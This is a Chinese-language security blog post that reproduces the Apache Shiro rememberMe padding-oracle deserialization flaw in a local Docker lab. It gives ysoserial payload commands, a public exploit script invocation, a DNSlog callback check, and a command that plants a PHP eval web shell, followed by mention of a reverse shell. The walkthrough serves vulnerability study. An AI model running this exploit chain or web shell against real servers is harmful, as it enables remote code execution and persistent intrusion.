<!DOCTYPE html>
<html>

	<head>
		
<title>Apache Shiro 反序列化漏洞-Quiet</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" type="image/x-icon" href="/image/favicon.ico">


<meta name="keywords" content="web,">
<meta name="description" content="">


<script src="/js/jquery.min.js"></script>


	<meta name="generator" content="Hexo 5.4.0"></head>

	<body>
		
<link rel="stylesheet" href="/css/page.css">


<link rel="stylesheet" href="/css/page_cente.css">


<link rel="stylesheet" href="/css/atom-one-dark.css">


<link rel="stylesheet" href="/css/header.css">

	<div class="header">
		<div class="header-top">
			<div class="h-left">
				<a href="/">
					<img src="/image/logo.png" alt="Quiet">
				</a>
			</div>
			<div class="h-right">
				<ul>
					
						
								<li>
									<a href="/">
										HOME
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/archives">
										ARCHIVE
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/categories">
										CATEGORIES
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/tags">
										TAGS
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/links">
										LINKS
									</a>
									<span class="dot"></span>
								</li>
								
									
						
								<li>
									<a href="/about">
										ABOUT
									</a>
									<span class="dot"></span>
								</li>
								
									
				</ul>
			</div>
			<div class="h-right-close">
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" width="24" height="24">
					<path fill="none" d="M0 0h24v24H0z" />
					<path d="M3 4h18v2H3V4zm0 7h18v2H3v-2zm0 7h18v2H3v-2z" fill="rgba(68,68,68,1)" />
				</svg>
			</div>
		</div>
	</div>
	<div class="sidebar">
    <div class="topo">
        <h2>KKfine</h2>
    </div>
    <ul>
        
        <li>
            <a href="/">HOME</a>
        </li>
        
        <li>
            <a href="/archives">ARCHIVE</a>
        </li>
        
        <li>
            <a href="/categories">CATEGORIES</a>
        </li>
        
        <li>
            <a href="/tags">TAGS</a>
        </li>
        
        <li>
            <a href="/links">LINKS</a>
        </li>
        
        <li>
            <a href="/about">ABOUT</a>
        </li>
        
    </ul>
    <div class="my_foot">
        
        <a target="_blank" rel="noopener" href="https://github.com/qiaobug">
            <img src="https://cdn.jsdelivr.net/gh/duogongneng/MyBlogImg/imggithub.png" alt="Quiet主题">
        </a>
        
    </div>
</div>
<div class='shelter'
    style='cursor: pointer;display: none; position: fixed;left: 0;top: 0; right: 0;bottom: 0;background-color: #fffff0;opacity:0.5;z-index: 108;'>
</div>
<style>
    .sidebar {
        width: 0;
        height: 100%;
        position: fixed;
        top: 0;
        right: 0;
        bottom: 0;
        background: #fff;
        z-index: 999;
        text-align: center;
        box-shadow: -6px 0 20px rgba(98, 94, 94, .815)
    }

    .topo {
        width: 100%;
        height: 200px;
        background: url(https://api.ixiaowai.cn/gqapi/gqapi.php) no-repeat;
        background-size: 100% 100%;
        position: relative;
        display: flex;
        align-items: flex-end
    }

    .topo h2 {
        color: #fff;
        z-index: 1;
        position: relative;
        margin: 0 0 10px 10px;
        font-size: 1.2em;
        box-sizing: border-box
    }

    .topo:before {
        content: '';
        background-image: url(/image/pattern.png);
        background-repeat: repeat;
        height: 100%;
        left: 0;
        position: absolute;
        top: 0;
        width: 100%;
        z-index: 1
    }

    .sidebar ul {
        width: 100%;
        margin-top: 50px
    }

    .sidebar ul li {
        height: 50px;
        list-style: none;
        font-size: 1.2em;
        text-align: right;
        margin-right: 10px
    }

    .sidebar ul li a {
        display: grid;
        color: #5d606a;
        text-overflow: ellipsis;
        width: 100%;
        text-decoration: none
    }

    .my_foot {
        width: 100%;
        padding: 10px;
        margin-bottom: 10px;
        position: absolute;
        bottom: 0
    }

    .my_foot a {
        text-decoration: none;
        margin-right: 10px;
        display: inline-block
    }

    .my_foot a img {
        width: 30px;
        height: 30px
    }
</style>

<script>
    $(function () { $('.h-right-close>svg').click(function () { $('.sidebar').animate({ width: "66%" }, 500); $('.shelter').fadeIn("slow") }); $('.shelter').click(function (e) { $('.sidebar').animate({ width: "0" }, 500); $('.shelter').fadeOut("slow") }) })
</script>
		<script>
			$(function () { $(window).scroll(function () { if ($(document).scrollTop() > 100) { $(".header-top").removeClass("header-move2"); $('.header-top').addClass('header-move1') } else { $(".header-top").removeClass("header-move1"); $('.header-top').addClass('header-move2') } }) });
		</script>
<div class="header-bg bg-content-img">
    <div class="bg-content">
        <ul class="tag">
            
            
            <li><a href="/tags/web">web</a></li>
            
            
        </ul>
        <h1>Apache Shiro 反序列化漏洞</h1>
        <div class="article-info">
            <div class="article-author">
                
                <svg t="1604839279282" class="icon" viewBox="0 0 1024 1024" version="1.1"
                    xmlns="http://www.w3.org/2000/svg" p-id="2901" width="20" height="20">
                    <path
                        d="M513 956.3c-247.7 0-448-200.3-448-448S265.3 66.2 513 66.2s448 200.3 448 448-200.3 442.1-448 442.1z m0-830.9c-212.2 0-388.8 170.7-388.8 388.8C124.2 726.3 294.9 903 513 903c212.2 0 388.8-170.7 388.8-388.8S725.2 125.4 513 125.4z m0 430.2c-94.2 0-170.7-76.5-170.7-170.7S418.8 207.8 513 207.8s170.7 76.5 170.7 170.7S607.2 555.6 513 555.6z m0-289.1c-64.6 0-112 52.8-112 112s47.4 117.9 112 117.9 112-52.8 112-112-47.4-117.9-112-117.9z m0 689.8c-135.7 0-259-58.7-341.9-158.9l-11.8-17.8 11.8-17.8c76.5-117.9 206.2-188.5 347.8-188.5 135.7 0 265 64.6 341.9 182.6l11.8 17.8-11.8 17.8C778 897.1 648.7 956.3 513 956.3zM230.3 773.2C300.9 849.7 406.9 897 513 897c112 0 218.1-47.4 288.6-129.8-70.5-88.2-170.7-135.6-282.7-135.6s-218.1 53.3-288.6 141.6z"
                        p-id="2902" fill="#ffffff"></path>
                </svg>
                
                <span> <a href="">KKfine</a></span>
                <p>2021-04-30 11:46:30</p>
            </div>
        </div>
    </div>
</div>
<div class="article-content">
    <div id="article" class="content">
        <h2 id="Apache-Shiro-反序列化漏洞（Shiro-721-CVE-2016-4437）"><a href="#Apache-Shiro-反序列化漏洞（Shiro-721-CVE-2016-4437）" class="headerlink" title="Apache Shiro 反序列化漏洞（Shiro-721 CVE-2016-4437）"></a>Apache Shiro 反序列化漏洞（Shiro-721 CVE-2016-4437）</h2><blockquote>
<p>Apache Shiro是一个强大且易用的Java安全框架,其支持身份验证、授权、密码和会话管理等。使用Shiro的API可以快速、轻松地获得任何应用程序。</p>
<p>2021年02月01日，Apache Shiro发布1.7.1版本，修复了 Apache Shiro 中的一个身份验证绕过漏洞（CVE-2020-17523）。当Apache Shiro与Spring结合使用时，攻击者可以使用恶意HTTP请求来绕过Shiro的身份认证。成功利用此漏洞的攻击者可以绕过身份验证，成功访问后台。</p>
</blockquote>
<blockquote>
<p>Apache Shiro 存在高危代码执行漏洞。该漏洞是由于Apache Shiro cookie中通过 AES-128-CBC 模式加密的rememberMe字段存在问题，用户可通过Padding Oracle 加密生成的攻击代码来构造恶意的rememberMe字段，并重新请求网站，进行反序列化攻击，最终导致任意代码执行。</p>
</blockquote>
<h4 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h4><p>复现环境: Apache Shiro 1.4.1 + tomcat:8-jre8<br>git下载shiro-720到本地环境</p>
<figure class="highlight awk"><table><tr><td class="code"><pre><code class="hljs awk">git clone https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/3ndz/</span>Shiro-<span class="hljs-number">721</span>.git<br></code></pre></td></tr></table></figure>

<p>对shiro-720进行编译</p>
<figure class="highlight mipsasm"><table><tr><td class="code"><pre><code class="hljs mipsasm">cd <span class="hljs-keyword">Shiro-721/Docker</span><br><span class="hljs-keyword">docker </span><span class="hljs-keyword">build </span>-t <span class="hljs-keyword">shiro-721 </span>.<br></code></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/20210620132903892.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>启动dokcer并将端口8080映射到主机端口9000上</p>
<figure class="highlight apache"><table><tr><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">docker</span> run -p <span class="hljs-number">9000</span>:<span class="hljs-number">8080</span> -d shiro-<span class="hljs-number">721</span><br></code></pre></td></tr></table></figure>

<p>查看是否搭建成功</p>
<figure class="highlight ebnf"><table><tr><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">docker ps</span><br></code></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/20210620133006473.png" alt="在这里插入图片描述"></p>
<h4 id="通过自行编译1-4-1war-包放入tomcat容器中运行"><a href="#通过自行编译1-4-1war-包放入tomcat容器中运行" class="headerlink" title="通过自行编译1.4.1war 包放入tomcat容器中运行"></a>通过自行编译1.4.1war 包放入tomcat容器中运行</h4><p>安装maven</p>
<figure class="highlight apache"><table><tr><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">wget</span> https://downloads.apache.org/maven/maven-<span class="hljs-number">3</span>/<span class="hljs-number">3</span>.<span class="hljs-number">6</span>.<span class="hljs-number">3</span>/binaries/apache-maven-<span class="hljs-number">3</span>.<span class="hljs-number">6</span>.<span class="hljs-number">3</span>-bin.tar.gz<br></code></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/20210620133119100.png" alt="在这里插入图片描述"></p>
<figure class="highlight apache"><table><tr><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">tar</span> zxvf  apache-maven-<span class="hljs-number">3</span>.<span class="hljs-number">6</span>.<span class="hljs-number">3</span>-bin.tar.gz  -C  /usr/local<br></code></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/20210620133234604.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>添加环境变量</p>
<figure class="highlight routeros"><table><tr><td class="code"><pre><code class="hljs routeros">vi /etc/profile<br><span class="hljs-builtin-name">export</span> <span class="hljs-attribute">MAVEN_HOME</span>=/usr/local/apache-maven-3.6.3<br><span class="hljs-builtin-name">export</span> <span class="hljs-attribute">PATH</span>=<span class="hljs-variable">$MAVEN_HOME</span>/bin:$PATH <br></code></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/20210620133359541.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>进入父bash查看mvn版本</p>
<figure class="highlight gradle"><table><tr><td class="code"><pre><code class="hljs gradle"><span class="hljs-keyword">source</span> <span class="hljs-regexp">/etc/</span>profile<br>mvn -v <br></code></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/20210620133509501.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<figure class="highlight dts"><table><tr><td class="code"><pre><code class="hljs dts">vim  <span class="hljs-meta-keyword">/usr/</span>local/apache-maven<span class="hljs-number">-3.6</span><span class="hljs-number">.3</span><span class="hljs-meta-keyword">/conf/</span>settings.xml<br>找到mirrors节点添加阿里镜像库地址：<br><span class="hljs-params">&lt;mirrors&gt;</span><br>    <span class="hljs-params">&lt;mirror&gt;</span><br>      <span class="hljs-params">&lt;id&gt;</span>alimaven<span class="hljs-params">&lt;/id&gt;</span><br>      <span class="hljs-params">&lt;name&gt;</span>aliyun maven<span class="hljs-params">&lt;/name&gt;</span><br>      <span class="hljs-params">&lt;url&gt;</span>http:<span class="hljs-comment">//maven.aliyun.com/nexus/content/groups/public/&lt;/url&gt;</span><br>      <span class="hljs-params">&lt;mirrorOf&gt;</span>central<span class="hljs-params">&lt;/mirrorOf&gt;</span>        <br>    <span class="hljs-params">&lt;/mirror&gt;</span><br>  <span class="hljs-params">&lt;/mirrors&gt;</span><br></code></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/2021062013361645.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>从 Apache Shiro Gtihub 官方仓库自行下载漏洞影响版本(<a target="_blank" rel="noopener" href="https://github.com/apache/shiro)%EF%BC%8C%E4%BD%BF%E7%94%A8">https://github.com/apache/shiro)，使用</a> Apache Maven(软件项目管理及自动构建工具) 编译构建生成 war Java 应用程序包。</p>
<figure class="highlight awk"><table><tr><td class="code"><pre><code class="hljs awk">git clone https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/apache/</span>shiro.git<br></code></pre></td></tr></table></figure>

<p>然后在执行</p>
<figure class="highlight apache"><table><tr><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">cd</span> shiro<br><span class="hljs-attribute">git</span> checkout shiro-root-<span class="hljs-number">1</span>.<span class="hljs-number">4</span>.<span class="hljs-number">1</span><br></code></pre></td></tr></table></figure>

<p>到这则搭建的没有问题<br><img src="https://img-blog.csdnimg.cn/20210620133711170.png" alt="在这里插入图片描述"></p>
<p>然后</p>
<figure class="highlight armasm"><table><tr><td class="code"><pre><code class="hljs armasm"><span class="hljs-symbol">cd</span> samples/web<br><span class="hljs-keyword">mvn</span> install<br></code></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/20210620133930385.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>将编译完成获取到的 samples-web-1.4.1.war 包( samples/target/中）拷贝到 Tomcat 的 webapps 目录下，启动tomcat即可。使用命令</p>
<figure class="highlight awk"><table><tr><td class="code"><pre><code class="hljs awk">sudo docker cp 虚拟机里的war绝对路径 docker容器ID:<span class="hljs-regexp">/usr/</span>local<span class="hljs-regexp">/tomcat/</span>webapps<br></code></pre></td></tr></table></figure>

<p>然后打开http://自己虚拟机的IP:9000/samples-web-1.4.1/</p>
<p><img src="https://img-blog.csdnimg.cn/20210620134413592.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<h3 id="测试与结果"><a href="#测试与结果" class="headerlink" title="测试与结果"></a>测试与结果</h3><h4 id="复现步骤："><a href="#复现步骤：" class="headerlink" title="复现步骤："></a>复现步骤：</h4><h6 id="输入正确的用户名和密码登录网站（勾选Remember），并从cookie中获取RememberMe值。"><a href="#输入正确的用户名和密码登录网站（勾选Remember），并从cookie中获取RememberMe值。" class="headerlink" title="输入正确的用户名和密码登录网站（勾选Remember），并从cookie中获取RememberMe值。"></a>输入正确的用户名和密码登录网站（勾选Remember），并从cookie中获取RememberMe值。</h6><h6 id="使用RememberMe-cookie作为Padding-Oracle-Attack的前缀。"><a href="#使用RememberMe-cookie作为Padding-Oracle-Attack的前缀。" class="headerlink" title="使用RememberMe cookie作为Padding Oracle Attack的前缀。"></a>使用RememberMe cookie作为Padding Oracle Attack的前缀。</h6><h6 id="加密ysoserial的序列化有效负载，以通过Padding-Oracle-Attack制作精心制作的RememberMe。"><a href="#加密ysoserial的序列化有效负载，以通过Padding-Oracle-Attack制作精心制作的RememberMe。" class="headerlink" title="加密ysoserial的序列化有效负载，以通过Padding Oracle Attack制作精心制作的RememberMe。"></a>加密ysoserial的序列化有效负载，以通过Padding Oracle Attack制作精心制作的RememberMe。</h6><h6 id="请求带有新的RememberMe-cookie的网站，以执行反序列化攻击。"><a href="#请求带有新的RememberMe-cookie的网站，以执行反序列化攻击。" class="headerlink" title="请求带有新的RememberMe cookie的网站，以执行反序列化攻击。"></a>请求带有新的RememberMe cookie的网站，以执行反序列化攻击。</h6><h6 id="攻击者无需知道RememberMe加密的密码密钥。"><a href="#攻击者无需知道RememberMe加密的密码密钥。" class="headerlink" title="攻击者无需知道RememberMe加密的密码密钥。"></a>攻击者无需知道RememberMe加密的密码密钥。</h6><h4 id="漏洞复现："><a href="#漏洞复现：" class="headerlink" title="漏洞复现："></a>漏洞复现：</h4><h5 id="一-漏洞利用复现01"><a href="#一-漏洞利用复现01" class="headerlink" title="一.漏洞利用复现01"></a>一.漏洞利用复现01</h5><p>登录 Shiro 测试账户获取合法 Cookie（勾选Remember Me）：</p>
<p><img src="https://img-blog.csdnimg.cn/20210620184816156.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>认证失败时（输入错误的用户名和密码），http响应页面中会显示出deleteMe的cookie:</p>
<p><img src="https://img-blog.csdnimg.cn/20210620185017886.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br>输入正确用户密码得到合法cookie：</p>
<p><img src="https://img-blog.csdnimg.cn/20210620190024434.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>认证成功（输入正确的用户名和密码登录），http响应页面中不会显示deleteMe的cookie:</p>
<p><img src="https://img-blog.csdnimg.cn/202106201903079.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>根据以上条件我们的思路是在正常序列化数据（需要一个已知的用户凭证获取正常序列化数据）后利用 Padding Oracle 构造我们自己的数据（Java序列化数据后的脏数据不影响反序列化结果），此时会有两中情况:</p>
<p>构造的数据不能通过字符填充验证，返回deleteme;<br>构造的数据可以成功解密通过字符填充验证，之后数据可以正常反序列化，不返回deleteme的cookie.<br>这里输入正确的用户名和密码，并勾选Remeber ME。</p>
<p>登录成功后，访问<a target="_blank" rel="noopener" href="http://192.168.1.14:8080/account/%EF%BC%8CF12%E5%BE%97%E5%88%B0Cookie%E4%B8%AD%E7%9A%84rememberMe%E5%80%BC">http://192.168.1.14:8080/account/，F12得到Cookie中的rememberMe值</a><br><img src="https://img-blog.csdnimg.cn/20210620190609805.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<h4 id="漏洞验证"><a href="#漏洞验证" class="headerlink" title="漏洞验证"></a>漏洞验证</h4><h4 id="方法一"><a href="#方法一" class="headerlink" title="方法一"></a>方法一</h4><p>使用Java反序列化工具 ysoserial 生成 Payload:</p>
<figure class="highlight apache"><table><tr><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">java</span>  -jar ysoserial-master-<span class="hljs-number">6</span>eca<span class="hljs-number">5</span>bc<span class="hljs-number">740</span>-<span class="hljs-number">1</span>.jar   CommonsCollections<span class="hljs-number">1</span> &#x27;touch /tmp/test&#x27; &gt; payload.class<br></code></pre></td></tr></table></figure>

<p>通过git对其padding oracle attack  poc进行下载</p>
<figure class="highlight awk"><table><tr><td class="code"><pre><code class="hljs awk">git clone  https:<span class="hljs-regexp">//gi</span>thub.com<span class="hljs-regexp">/wuppp/</span>shiro_rce_exp.git<br></code></pre></td></tr></table></figure>

<p>通过 Padding Oracle Attack 生成 Evil Rememberme cookie:<br>此 exp 爆破时间较长，建议使用 ysoserial 生成较短的 payload 验证（如： ping 、 touch /tmp/test等），生成成功后将自动停止运行。</p>
<figure class="highlight vim"><table><tr><td class="code"><pre><code class="hljs vim">也可用<span class="hljs-keyword">python</span>自动化脚本<br><span class="hljs-keyword">cp</span> payload.class  shiro_rce_exp/<br><span class="hljs-keyword">cd</span> shiro_rce_exp/<br><span class="hljs-keyword">python</span> shiro_exp.<span class="hljs-keyword">py</span> http://自己的ip:docker的端口/account/ 此处为上面获取Rememberme cookie payload.class<br></code></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/20210625224820201.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20210625224946755.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>使用Evil Rememberme cookie 认证进行反序列化攻击：复制该cookie，然后重放一下数据，即可成功执行命令,此处脚本爆破出正确的Rememberme cookie需要较长时间。<br><img src="https://img-blog.csdnimg.cn/20210625225948360.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>还可以用dnslog提供的dns地址解析来验证</p>
<figure class="highlight apache"><table><tr><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">java</span>  -jar ysoserial-master-<span class="hljs-number">6</span>eca<span class="hljs-number">5</span>bc<span class="hljs-number">740</span>-<span class="hljs-number">1</span>.jar CommonsBeanutils<span class="hljs-number">1</span> <span class="hljs-string">&quot;ping y2xqmm.dnslog.cn&quot;</span> &gt; payload.class<br></code></pre></td></tr></table></figure>

<h4 id="方法二使用shiro550-721漏洞检查工具对其进行验证"><a href="#方法二使用shiro550-721漏洞检查工具对其进行验证" class="headerlink" title="方法二使用shiro550/721漏洞检查工具对其进行验证"></a>方法二使用shiro550/721漏洞检查工具对其进行验证</h4><p>工具下载地址：<br><a target="_blank" rel="noopener" href="https://github.com/feihong-cs/ShiroExploit-Deprecated/releases/download/v2.51/ShiroExploit.V2.51.7z">https://github.com/feihong-cs/ShiroExploit-Deprecated/releases/download/v2.51/ShiroExploit.V2.51.7z</a></p>
<p><img src="https://img-blog.csdnimg.cn/20210626015025253.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20210626142410269.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p><img src="https://img-blog.csdnimg.cn/20210626020227297.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>最后有加号即存在漏洞</p>
<h4 id="提权shell"><a href="#提权shell" class="headerlink" title="提权shell"></a>提权shell</h4><p>生成payload然后用上述方法获取恶意rememberkey</p>
<figure class="highlight apache"><table><tr><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">java</span>  -jar ysoserial-master-d<span class="hljs-number">367</span>e<span class="hljs-number">379</span>d<span class="hljs-number">9</span>-<span class="hljs-number">1</span>.jar  CommonsCollections<span class="hljs-number">1</span> &#x27;touch /usr/local/tomcat/webapps/samples-web-<span class="hljs-number">1</span>.<span class="hljs-number">4</span>.<span class="hljs-number">1</span>/<span class="hljs-number">1</span>.php&#x27; &gt; payload<span class="hljs-number">2</span>.class<br><br><span class="hljs-attribute">java</span>  -jar ysoserial-master-d<span class="hljs-number">367</span>e<span class="hljs-number">379</span>d<span class="hljs-number">9</span>-<span class="hljs-number">1</span>.jar  CommonsCollections<span class="hljs-number">1</span> &#x27;echo <span class="hljs-string">&quot;&lt;?php eval($_POST[&quot;</span>cmd<span class="hljs-string">&quot;]);&quot;</span> &gt; /usr/local/tomcat/webapps/samples-web-<span class="hljs-number">1</span>.<span class="hljs-number">4</span>.<span class="hljs-number">1</span>/<span class="hljs-number">1</span>.php&#x27; &gt; payload<span class="hljs-number">2</span>.class<br><br></code></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/20210626141447776.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>重放之后进入1.php可看到内容</p>
<p><img src="https://img-blog.csdnimg.cn/20210626142151449.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>
<p>最后用蚁剑连接即可，或者直接shrio工具反弹shell</p>
<p><img src="https://img-blog.csdnimg.cn/20210626144042750.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20210626152005550.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hhb2FtaWZpbmU=,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p>

    </div>
</div>
<style>
    #noneimg img {
        display: none;
        z-index: 109;
        width: 600px !important;
        border-radius: 0px;
        position: fixed;
        box-shadow: 0 0 0px #c3c3c300 !important;
        left: 0;
        top: 0;
        right: 0;
        bottom: 0;
        margin: auto !important;
    }

    @media screen and (max-width:600px) {
        #noneimg img {
            width: 88%
        }
    }
</style>
<script>
    $(function () { $('#article').click(function (e) { if (e.target.tagName == "IMG") { if ($('#nonediv').length == 0) { let MImg = `<div id='noneimg'><img src='${e.target.currentSrc}'></div>`; let MDiv = "<div id='nonediv' style='cursor: pointer;display: none; position: fixed;left: 0;top: 0; right: 0;bottom: 0;background-color: #fffff0;opacity:0.5;z-index: 108;'></div>"; $('#article').append(MDiv); $('#article').append(MImg); $("#nonediv").fadeIn("slow"); $("#noneimg img").fadeIn("slow") } } else { if ($('#nonediv').length !== 0) { $("#noneimg ").fadeOut("slow"); $("#nonediv").fadeOut("slow"); setTimeout(function () { $('#nonediv').remove(); $('#noneimg').remove() }, 500) } } }); $('.article-content').addClass('content-move') });
</script>
<div class="Last-Next">
    
    <a href="/2021/04/30/2021-7-2-LightCMS1.3.7/">
        <div class="last">
            <span>上一篇</span>
            <p>LightCMS1.3.7漏洞复现</p>
        </div>
    </a>
    

    
    <a href="/2021/04/19/2021-4-19-%E5%BC%BA%E7%BD%91%E6%9D%AF%E9%AB%98%E6%98%8E%E7%9A%84%E9%BB%91%E5%AE%A2/">
        <div class="next">
            <span>下一篇</span>
            <p>buu上强网杯高明的黑客</p>
        </div>
    </a>
    
</div>
		
<link rel="stylesheet" href="/css/food.css">

<div class="footer">
	<div class="Copyright">
		©2021 By KKfine. 主题：<a
			style="text-decoration: none;display: contents; color: #898F9F;"
			target="_blank" rel="noopener" href="https://github.com/qiaobug/hexo-theme-quiet">Quiet</a>
	</div>
	<div class="contact">
		
		<a target="_blank" rel="noopener" href="https://github.com/qiaobug">
			<img src="https://cdn.jsdelivr.net/gh/duogongneng/MyBlogImg/imggithub.png" alt="Quiet主题">
		</a>
		
	</div>
</div>

<script src="/js/jquery.min.js"></script>


<script src="/js/gotop.js"></script>


<style type="text/css">
    @media screen and (min-width: 600px) {
        .goTop>span {
            display: block;
            border-radius: 50%;
            width: 66px;
            height: 66px;
            cursor: pointer;
            opacity: 0.8;
            background: rgba(18, 24, 58, 0.06);
            text-align: center;
            border: 1px solid rgba(18, 24, 58, 0.06);

            transition: border .5s;
            -moz-transition: border .5s;
            /* Firefox 4 */
            -webkit-transition: border .5s;
            /* Safari 和 Chrome */
            -o-transition: border .5s;
            /* Opera */
        }

        .goTop>span:hover {
            border: 1px solid #6680B3;
        }


        .goTop {
            position: fixed;
            right: 30px;
            bottom: 80px;
        }

        .goTop>span>svg {
            width: 30px;
            height: 30px;
            margin-top: 17.5px;
            opacity: 0.7;
        }

    }

    @media screen and (max-width: 600px) {
        .goTop {
            display: none;
        }
    }
</style>
<div class="goTop" id="js-go_top">
    <span>
